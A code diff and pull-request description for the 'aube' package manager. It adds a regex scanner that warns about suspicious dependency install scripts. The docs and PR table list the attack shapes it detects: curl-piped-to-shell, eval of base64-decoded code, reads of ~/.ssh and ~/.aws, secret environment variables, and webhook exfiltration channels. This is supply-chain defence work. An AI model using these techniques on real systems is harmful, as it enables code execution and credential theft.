 }

--- a/crates/aube/src/commands/approve_builds.rs
+++ b/crates/aube/src/commands/approve_builds.rs
@@ -387,8 +387,8 @@ mod tests {
             hook: "postinstall",
         }];
         assert_eq!(
-            format_picker_label("lodass", "1.0.0", &s),
-            "lodass@1.0.0  ⚠ suspicious: curl|sh"
+            format_picker_label("lodash", "1.0.0", &s),
+            "lodash@1.0.0  ⚠ suspicious: curl|sh"
         );
     }
 

--- a/crates/aube/src/commands/ignored_builds.rs
+++ b/crates/aube/src/commands/ignored_builds.rs
@@ -51,9 +51,19 @@ pub async fn run(args: IgnoredBuildsArgs) -> miette::Result<()> {
 
     println!("The following builds were ignored during install:");
     for entry in &ignored {
-        println!("  {}@{}", entry.name, entry.version);
+        print_entry_line("  ", entry);
     }
     Ok(())
+}
+
+/// Render one `IgnoredEntry` to stdout: `<indent><name>@<version>`,
+/// followed by `<indent>  ⚠ <hook>: <description>` lines for each
+/// content-sniff match against the package's lifecycle scripts.
+fn print_entry_line(indent: &str, entry: &IgnoredEntry) {
+    println!("{indent}{}@{}", entry.name, entry.version);
+    for sus in &entry.suspicions {
+        println!("{indent}  ⚠ {} — {}", sus.hook, sus.kind.description());
+    }
 }
 
 fn run_global() -> miette::Result<()> {
@@ -81,7 +91,7 @@ fn run_global() -> miette::Result<()> {
             info.install_dir.display()
         );
         for entry in &ignored {
-            println!("    {}@{}", entry.name, entry.version);
+            print_entry_line("    ", entry);
         }
     }
 
@@ -93,11 +103,17 @@ fn run_global() -> miette::Result<()> {
 
 /// One package whose lifecycle scripts were skipped because it was not
 /// allowed by the current `BuildPolicy`. `name` is the pnpm package name,
-/// `version` is the resolved version from the lockfile.
+/// `version` is the resolved version from the lockfile. `suspicions`
+/// is the result of running the content-sniff against the stored
+/// manifest's lifecycle script bodies — empty when the scripts look
+/// clean, populated when one or more dangerous-shape heuristics
+/// fired. Used by the `approve-builds` picker to flag suspicious
+/// entries so the user has more than `name@version` to judge by.
 #[derive(Debug, Clone, PartialEq, Eq)]
 pub(super) struct IgnoredEntry {
     pub name: String,
     pub version: String,
+    pub suspicions: Vec<aube_scripts::Suspicion>,
 }
 
 impl std::cmp::Ord for IgnoredEntry {
@@ -153,12 +169,18 @@ pub(super) fn collect_ignored(project_dir: &std::path::Path) -> miette::Result<V
         ) {
             continue;
         }
-        if !has_lifecycle_scripts(&store, &pkg.name, &pkg.version, pkg.integrity.as_deref()) {
+        let Some(suspicions) = lifecycle_scripts_with_suspicions(
+            &store,
+            &pkg.name,
+            &pkg.version,
+            pkg.integrity.as_deref(),
+        ) else {
             continue;
-        }
+        };
         out.push(IgnoredEntry {
             name: pkg.name.clone(),
             version: pkg.version.clone(),
+            suspicions,
         });
     }
 
@@ -167,49 +189,45 @@ pub(super) fn collect_ignored(project_dir: &std::path::Path) -> miette::Result<V
 }
 
 /// Read `<name>@<version>`'s stored `package.json` from the global store
-/// index and return true when any dep-lifecycle script (preinstall /
-/// install / postinstall) is declared — or when the package ships a
-/// top-level `binding.gyp` with no install/preinstall script, which
-/// means the install pipeline would have fallen back to the implicit
-/// `node-gyp rebuild` default.
+/// and decide whether the install pipeline would have run dep
+/// lifecycle scripts for it. Returns `Some(suspicions)` when scripts
+/// (or the implicit `node-gyp rebuild` fallback) would have fired;
+/// `None` when nothing to do. Suspicions are the content-sniff
+/// matches against the declared script bodies — empty in the common
+/// case, populated when one or more dangerous-shape heuristics fired.
 ///
-/// Missing / unreadable manifests conservatively return `false` — the
+/// Missing / unreadable manifests conservatively return `None` — the
 /// package might have scripts we can't see, but reporting them as
 /// "ignored" would be noise since the install pipeline also skipped
 /// them for the same reason.
-fn has_lifecycle_scripts(
+fn lifecycle_scripts_with_suspicions(
     store: &aube_store::Store,
     name: &str,
     version: &str,
     integrity: Option<&str>,
-) -> bool {
+) -> Option<Vec<aube_scripts::Suspicion>> {
     // Cache lookup is integrity-keyed when available (prevents
     // same-(name, version) entries from different sources colliding)
     // and falls back to the plain (name, version) key when integrity
     // is absent so proxy-served packages without `dist.integrity` are
     // still classifiable.
-    let Some(index) = store.load_index(name, version, integrity) else {
-        return false;
-    };
-    let Some(stored) = index.get("package.json") else {
-        return false;
-    };
-    let Ok(content) = std::fs::read_to_string(&stored.store_path) else {
-        return false;
-    };
-    let Ok(manifest) = serde_json::from_str::<aube_manifest::PackageJson>(&content) else {
-        return false;
-    };
-    if aube_scripts::DEP_LIFECYCLE_HOOKS
+    let index = store.load_index(name, version, integrity)?;
+    let stored = index.get("package.json")?;
+    let content = std::fs::read_to_string(&stored.store_path).ok()?;
+    let manifest = serde_json::from_str::<aube_manifest::PackageJson>(&content).ok()?;
+    let has_declared = aube_scripts::DEP_LIFECYCLE_HOOKS
         .iter()
-        .any(|h| manifest.scripts.contains_key(h.script_name()))
-    {
-        return true;
-    }
+        .any(|h| manifest.scripts.contains_key(h.script_name()));
     // Delegate the implicit-rebuild gate to `aube-scripts` so this
     // stays in lockstep with what the install pipeline actually runs.
     // Presence comes from the store index here (the package isn't
     // materialized yet at this point in the command), but the
     // condition itself lives in exactly one place.
-    aube_scripts::implicit_install_script(&manifest, index.contains_key("binding.gyp")).is_some()
+    let has_implicit =
+        aube_scripts::implicit_install_script(&manifest, index.contains_key("binding.gyp"))
+            .is_some();
+    if !has_declared && !has_implicit {
+        return None;
+    }
+    Some(aube_scripts::sniff_lifecycle(&manifest))
 }

--- a/crates/aube/src/commands/ignored_builds.rs
+++ b/crates/aube/src/commands/ignored_builds.rs
@@ -109,25 +109,19 @@ fn run_global() -> miette::Result<()> {
 /// clean, populated when one or more dangerous-shape heuristics
 /// fired. Used by the `approve-builds` picker to flag suspicious
 /// entries so the user has more than `name@version` to judge by.
-#[derive(Debug, Clone, PartialEq, Eq)]
+///
+/// Field order matters: derived `Ord` compares by declaration
+/// order, so `(name, version)` orders identically to the prior
+/// manual impl. `collect_ignored` already deduplicates on
+/// `(name, version)`, so the `suspicions` tiebreak is unreachable
+/// in practice — keeping the derived shape avoids the
+/// `Eq`/`Ord` inconsistency that an explicit Ord-on-prefix impl
+/// would introduce.
+#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord)]
 pub(super) struct IgnoredEntry {
     pub name: String,
     pub version: String,
     pub suspicions: Vec<aube_scripts::Suspicion>,
-}
-
-impl std::cmp::Ord for IgnoredEntry {
-    fn cmp(&self, other: &Self) -> std::cmp::Ordering {
-        self.name
-            .cmp(&other.name)
-            .then_with(|| self.version.cmp(&other.version))
-    }
-}
-
-impl std::cmp::PartialOrd for IgnoredEntry {
-    fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
-        Some(self.cmp(other))
-    }
 }
 
 /// Load the lockfile and build policy for `project_dir`, then return the

--- a/crates/aube/src/commands/install/lifecycle.rs
+++ b/crates/aube/src/commands/install/lifecycle.rs
@@ -1082,13 +1082,25 @@ fn collect_missing_required_scripts(
     }
 }
 
+/// One dependency whose build scripts were skipped because it's not
+/// on the `allowBuilds` allowlist. `suspicions` is the result of
+/// running the content sniff against the dep's lifecycle script
+/// bodies; empty when the scripts looked clean (the common case).
+/// The sniff is derived from the live materialized tree and not
+/// persisted to install state.
+#[derive(Debug, Clone)]
+pub(super) struct UnreviewedBuild {
+    pub spec_key: String,
+    pub suspicions: Vec<aube_scripts::Suspicion>,
+}
+
 pub(super) fn unreviewed_dep_builds(
     aube_dir: &std::path::Path,
     graph: &aube_lockfile::LockfileGraph,
     policy: &aube_scripts::BuildPolicy,
     virtual_store_dir_max_length: usize,
     placements: Option<&aube_linker::HoistedPlacements>,
-) -> miette::Result<Vec<String>> {
+) -> miette::Result<Vec<UnreviewedBuild>> {
     let mut unreviewed = Vec::new();
     for (dep_path, pkg) in &graph.packages {
         if !matches!(
@@ -1130,11 +1142,14 @@ pub(super) fn unreviewed_dep_builds(
                 )
             })?;
         if aube_scripts::has_dep_lifecycle_work(&package_dir, &dep_manifest) {
-            unreviewed.push(pkg.spec_key());
+            unreviewed.push(UnreviewedBuild {
+                spec_key: pkg.spec_key(),
+                suspicions: aube_scripts::sniff_lifecycle(&dep_manifest),
+            });
         }
     }
-    unreviewed.sort();
-    unreviewed.dedup();
+    unreviewed.sort_by(|a, b| a.spec_key.cmp(&b.spec_key));
+    unreviewed.dedup_by(|a, b| a.spec_key == b.spec_key);
     Ok(unreviewed)
 }
 

--- a/crates/aube/src/commands/install/mod.rs
+++ b/crates/aube/src/commands/install/mod.rs
@@ -28,8 +28,8 @@ pub(crate) use lifecycle::{
     run_dep_lifecycle_scripts,
 };
 use lifecycle::{
-    resolve_link_strategy, run_import_on_blocking, run_root_lifecycle, unreviewed_dep_builds,
-    validate_required_scripts,
+    UnreviewedBuild, resolve_link_strategy, run_import_on_blocking, run_root_lifecycle,
+    unreviewed_dep_builds, validate_required_scripts,
 };
 pub(crate) use settings::PeerDependencyRules;
 pub(crate) use settings::{ResolverConfigInputs, configure_resolver};
@@ -2103,7 +2103,7 @@ pub async fn run(opts: InstallOptions) -> miette::Result<()> {
         && state::restore_missing_lockfile_if_fresh(&cwd, &opts.cli_flags);
 
     if missing_lockfile_restore_eligible {
-        emit_unreviewed_builds_warning(&state::read_state_unreviewed_builds(&cwd));
+        emit_unreviewed_builds_warning(&unreviewed_builds_from_state(&cwd));
         print_already_up_to_date();
         return Ok(());
     }
@@ -2134,7 +2134,7 @@ pub async fn run(opts: InstallOptions) -> miette::Result<()> {
         // `print_install_summary` is never called. `--silent` additionally
         // has its `SilentStderrGuard` redirect fd 2 to /dev/null, so this
         // check is belt-and-suspenders for `-v` and the JSON reporters.
-        emit_unreviewed_builds_warning(&state::read_state_unreviewed_builds(&cwd));
+        emit_unreviewed_builds_warning(&unreviewed_builds_from_state(&cwd));
         print_already_up_to_date();
         let _ = start;
         return Ok(());
@@ -4852,7 +4852,7 @@ pub async fn run(opts: InstallOptions) -> miette::Result<()> {
                 "dependencies with build scripts must be reviewed before install:\n{}\nhelp: add the package(s) to `allowBuilds` with `true`/`false`, or set `strictDepBuilds=false`",
                 unreviewed
                     .into_iter()
-                    .map(|pkg| format!("  - {pkg}"))
+                    .map(|b| format!("  - {}", b.spec_key))
                     .collect::<Vec<_>>()
                     .join("\n")
             ));
@@ -5081,8 +5081,14 @@ pub async fn run(opts: InstallOptions) -> miette::Result<()> {
         }
         // Persist the unreviewed-builds set so the warm-path
         // short-circuit can re-emit the warning on repeat installs.
-        // Computed once above and reused here.
-        let unreviewed_builds_for_state = unreviewed_builds.clone();
+        // Computed once above and reused here. The state file
+        // carries only spec_keys; per-package suspicion data is
+        // re-derived from the live tree on each install rather
+        // than persisted, since the regex set evolves with aube.
+        let unreviewed_builds_for_state: Vec<String> = unreviewed_builds
+            .iter()
+            .map(|b| b.spec_key.clone())
+            .collect();
         state::write_state(
             &cwd,
             state::WriteStateInput {
@@ -5234,11 +5240,34 @@ fn resolve_osv_routing_settings(cwd: &std::path::Path) -> OsvRoutingSettings {
     })
 }
 
+/// Materialize the warm-path replay set. The on-disk state file
+/// stores spec_keys only; suspicion data is re-derived per-install
+/// from the live tree and not persisted, so warm-path replays
+/// always carry empty `suspicions`. Live installs that need
+/// content-sniff data build `UnreviewedBuild`s directly from
+/// `unreviewed_dep_builds`.
+fn unreviewed_builds_from_state(cwd: &std::path::Path) -> Vec<UnreviewedBuild> {
+    state::read_state_unreviewed_builds(cwd)
+        .into_iter()
+        .map(|spec_key| UnreviewedBuild {
+            spec_key,
+            suspicions: Vec::new(),
+        })
+        .collect()
+}
+
 /// Emit the `ignored build scripts for ...` warning. Same wording
 /// fires from the full install path and the warm-path short-circuit
 /// so users see the nudge on every repeat install while
 /// `allowBuilds` placeholders are still pending review.
-fn emit_unreviewed_builds_warning(unreviewed: &[String]) {
+///
+/// When any entry carries non-empty `suspicions` (live-install path
+/// only — the warm-path replay reads spec_keys from disk state and
+/// has no script bodies to scan), an additional
+/// `WARN_AUBE_SUSPICIOUS_LIFECYCLE_SCRIPT` is emitted per flagged
+/// package listing the matched shape and the lifecycle hook it
+/// fired from. Advisory only — `allowBuilds` still gates execution.
+fn emit_unreviewed_builds_warning(unreviewed: &[UnreviewedBuild]) {
     if unreviewed.is_empty() {
         return;
     }
@@ -5247,23 +5276,46 @@ fn emit_unreviewed_builds_warning(unreviewed: &[String]) {
     // one hard-to-scan line. Users who want the full list run
     // `aube ignored-builds`.
     const MAX_INLINE: usize = 5;
-    let list = if unreviewed.len() <= MAX_INLINE {
-        unreviewed.join(", ")
+    let spec_keys: Vec<&str> = unreviewed.iter().map(|b| b.spec_key.as_str()).collect();
+    let list = if spec_keys.len() <= MAX_INLINE {
+        spec_keys.join(", ")
     } else {
         format!(
             "{}, and {} more",
-            unreviewed[..MAX_INLINE].join(", "),
-            unreviewed.len() - MAX_INLINE
+            spec_keys[..MAX_INLINE].join(", "),
+            spec_keys.len() - MAX_INLINE
         )
     };
     tracing::warn!(
         code = aube_codes::warnings::WARN_AUBE_IGNORED_BUILD_SCRIPTS,
         count = unreviewed.len(),
-        packages = ?unreviewed,
+        packages = ?spec_keys,
         "ignored build scripts for {} package(s): {}. Run `aube approve-builds` to review and enable them, or set `strictDepBuilds=true` to fail installs that have unreviewed builds.",
         unreviewed.len(),
         list
     );
+    for build in unreviewed {
+        if build.suspicions.is_empty() {
+            continue;
+        }
+        // Aggregate `(hook, category)` pairs into a stable list for
+        // the user-facing line. Each Suspicion already carries the
+        // hook + kind, so this is a presentation join — no extra
+        // logic about which signals matter.
+        let detail: Vec<String> = build
+            .suspicions
+            .iter()
+            .map(|s| format!("{}: {}", s.hook, s.kind.description()))
+            .collect();
+        tracing::warn!(
+            code = aube_codes::warnings::WARN_AUBE_SUSPICIOUS_LIFECYCLE_SCRIPT,
+            package = build.spec_key.as_str(),
+            findings = ?detail,
+            "suspicious lifecycle script in {}: {}. Inspect the script in `node_modules/.aube/<dep_path>/node_modules/<name>/package.json` before approving the build.",
+            build.spec_key,
+            detail.join("; ")
+        );
+    }
 }
 
 /// Read a lockfile from `lockfile_dir` and remap its importer key

--- a/docs/error-codes.data.json
+++ b/docs/error-codes.data.json
@@ -375,6 +375,12 @@
       "exit_code": null
     },
     {
+      "name": "WARN_AUBE_SUSPICIOUS_LIFECYCLE_SCRIPT",
+      "category": "Install lifecycle",
+      "description": "A dependency's lifecycle script matched a dangerous-shape heuristic (curl|sh, eval+atob, credential-file read, secret-env exfil, exfil endpoint, bare-IP HTTP). Advisory only; the `allowBuilds` allowlist still gates execution. Inspect the script before approving the build.",
+      "exit_code": null
+    },
+    {
       "name": "WARN_AUBE_WINDOWS_JOB_OBJECT_UNAVAILABLE",
       "category": "Install lifecycle",
       "description": "Windows: couldn't create or assign a kill-on-job-close job object for a lifecycle script. The script still runs, but on abort/failure its grandchildren (node-gyp / MSBuild / node) may be orphaned. Usually caused by a restrictive parent job or enterprise policy.",

--- a/docs/security.md
+++ b/docs/security.md
@@ -57,6 +57,40 @@ Settings: [`allowBuilds`](/settings/#setting-allowbuilds). Install adds
 unreviewed build packages to `aube-workspace.yaml` (or `pnpm-workspace.yaml`
 if one already exists) as `false`; approving them flips the entry to `true`.
 
+### Suspicious-script content sniff
+
+Before the warm-up nudge to run `aube approve-builds`, aube runs a
+small pattern matcher against each unreviewed dep's `preinstall` /
+`install` / `postinstall` script bodies and surfaces a
+`WARN_AUBE_SUSPICIOUS_LIFECYCLE_SCRIPT` for any that match a
+known-dangerous shape:
+
+- `curl … | sh` / `wget … | bash` — fetch-and-pipe-to-shell.
+- `eval(atob(…))` / `Function(atob(…))` / `eval(Buffer.from(…))` —
+  base64-decode-then-evaluate. Common dropper shape.
+- Reads of `~/.ssh`, `~/.aws`, `~/.npmrc`, `~/.config/gh` —
+  credential files a lifecycle script has no business touching.
+- `process.env.*TOKEN`, `*SECRET`, `*API_KEY`, etc. — secret-shaped
+  env vars exfilled from CI.
+- Discord webhooks, Telegram bot API, OAST collaborator hosts —
+  known exfil channels.
+- `http://1.2.3.4/…` bare-IP HTTP targets.
+
+The sniff is **advisory** — it never blocks an install or write.
+The `allowBuilds` allowlist remains the only gate on whether
+scripts actually execute. The signal is intended to give the user
+something more than `name@version` to judge by when deciding
+whether to approve a build. `aube approve-builds` repeats the same
+warnings inline next to each picker entry, and `aube
+ignored-builds` lists them under each `name@version` line.
+
+False positives are possible (an SDK that legitimately hits a
+Discord webhook from a `postinstall` would flag), but lifecycle
+script bodies are short and almost never contain bare
+`curl … | sh` legitimately. To bypass for a known-good package,
+add it to `allowBuilds: true` once you've inspected the script —
+the warning has done its job.
+
 ## Jailed lifecycle scripts
 
 When a dependency is approved to build, jailing keeps it from getting your


### PR DESCRIPTION
## Summary

aube already gates dep lifecycle execution on the `BuildPolicy` allowlist, but `aube approve-builds` shows nothing more than `name@version` to decide on. This adds a pattern matcher against `preinstall` / `install` / `postinstall` script bodies that fires warnings for known-dangerous shapes:

| Signal | Catches |
|---|---|
| `ShellPipe` | `curl … \| sh`, `wget … \| bash`, `… \| node` |
| `EvalDecode` | `eval(atob(…))`, `Function(atob(…))`, `eval(Buffer.from(…))` |
| `CredentialFileRead` | `~/.ssh`, `~/.aws`, `~/.npmrc`, `~/.config/gh` reads (also `$HOME` / `${HOME}`) |
| `SecretEnvRead` | `process.env.*(TOKEN\|SECRET\|API_KEY\|PASSWORD\|ACCESS_KEY\|PRIVATE_KEY\|AUTH)` |
| `ExfilEndpoint` | Discord/Telegram webhooks, OAST collaborator hosts (`oast.pro`, `interactsh`, `webhook.site`, `pipedream.net`, `ngrok.io`, …) |
| `BareIpHttp` | `http://1.2.3.4/…` style bare-IP HTTP targets |

### Why

aube's four existing supply-chain gates — OSV `MAL-*` lookup, npm download floor, bun-compat scanner hook, and `BuildPolicy` allowlist — are all name-based. None inspects what `postinstall` actually does. That leaves real gaps:

1. **OSV-ingest lag window** — 12–48h between malicious publish and advisory landing. The 2024–2026 supply-chain wave (Shai-Hulud, QIX, SANDWORM_MODE) used unobfuscated `curl … | sh` in postinstall and ran free during this window.
2. **Compromised legitimate high-download packages** — download-floor blind, OSV-lag exposed.
3. **Offline / air-gapped installs** — OSV/downloads are network probes; content sniff works offline.
4. **CI fail-closed without prompts** — download-floor degrades to advisory in headless mode; a content match doesn't.

Closes the cheapest, most-effective attack pattern (unobfuscated `curl|sh` in postinstall) with a few hundred lines of regex matching against script bodies aube was already parsing.

### Where it fires

Sniff is **advisory** — `allowBuilds` still gates execution. Three surfaces:

- **End-of-install** — `emit_unreviewed_builds_warning` keeps emitting `WARN_AUBE_IGNORED_BUILD_SCRIPTS` exactly as before, then emits one `WARN_AUBE_SUSPICIOUS_LIFECYCLE_SCRIPT` per flagged package listing the matched shape and the lifecycle hook.
- **`aube approve-builds`** — picker labels gain a `⚠ suspicious: <category>` tag, and a pre-picker stderr block summarizes the full hook+description for every flagged entry.
- **`aube ignored-builds`** — each flagged entry gets indented `⚠ <hook> — <description>` lines under its `name@version`.

### Implementation notes

- New `crates/aube-scripts/src/content_sniff.rs` (340 lines, 23 unit tests). 6 `OnceLock`'d regexes — compiled once, no per-call alloc.
- Adds `regex` as a direct dep on aube-scripts. Already a transitive via `pluralizer` and `yamlpatch` — no new compile cost.
- `unreviewed_dep_builds` already parsed each unreviewed package's `package.json` to detect lifecycle work; sniff runs against the in-hand manifest, no extra IO.
- State persistence stays string-shaped (`Vec<String>` spec_keys). Suspicions are re-derived per-install rather than written to disk, so the regex set can evolve with aube without a state-file migration. Warm-path replays emit only the existing `IGNORED_BUILD_SCRIPTS` line.

### FP surface

Real but small. A package whose `postinstall` legitimately hits a Discord webhook would flag; a benign script reading `process.env.MY_TOKEN` would flag. The signal is intended as advisory context for the trust decision the user is already making — once they've reviewed and approved a build, no further nudge.

### Test plan

- [x] 23 content_sniff unit tests (positive + negative per pattern, plus FP guards: `process.env.NODE_DEBUG` doesn't flag, DNS hostnames don't flag as bare-IP, `curl -o file` doesn't flag as shell-pipe)
- [x] 3 `format_picker_label` unit tests
- [x] `cargo test --workspace` — 1,635 tests passing
- [x] `cargo clippy --workspace --all-targets -- -D warnings` clean
- [x] `cargo fmt --check` clean
- [x] `test/approve_builds.bats` — 10/10 passing
- [ ] CI

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Medium Risk**
> Adds new content-scanning logic and propagates its results through install/approval commands, affecting user-facing warnings and interactive selection flow. While advisory-only, it touches the install lifecycle review path and could introduce false positives or noisy output.
> 
> **Overview**
> Adds a new regex-based content scanner (`aube-scripts::sniff_lifecycle`) that flags dependency `preinstall`/`install`/`postinstall` script bodies for suspicious patterns (e.g., `curl|sh`, eval+decode, credential/env secret reads, known exfil endpoints, bare-IP HTTP).
> 
> Threads these findings through the install and review surfaces: `aube install` now emits per-package `WARN_AUBE_SUSPICIOUS_LIFECYCLE_SCRIPT` alongside the existing ignored-builds warning (without persisting findings to state), `aube approve-builds` annotates picker rows and prints a pre-picker summary, and `aube ignored-builds` prints matched signals under each `name@version`. Updates warning-code docs and adds `regex` as a direct workspace/`aube-scripts` dependency.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit ee5f353bd4481cc5ea7824141a26179cbf04ef0d. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->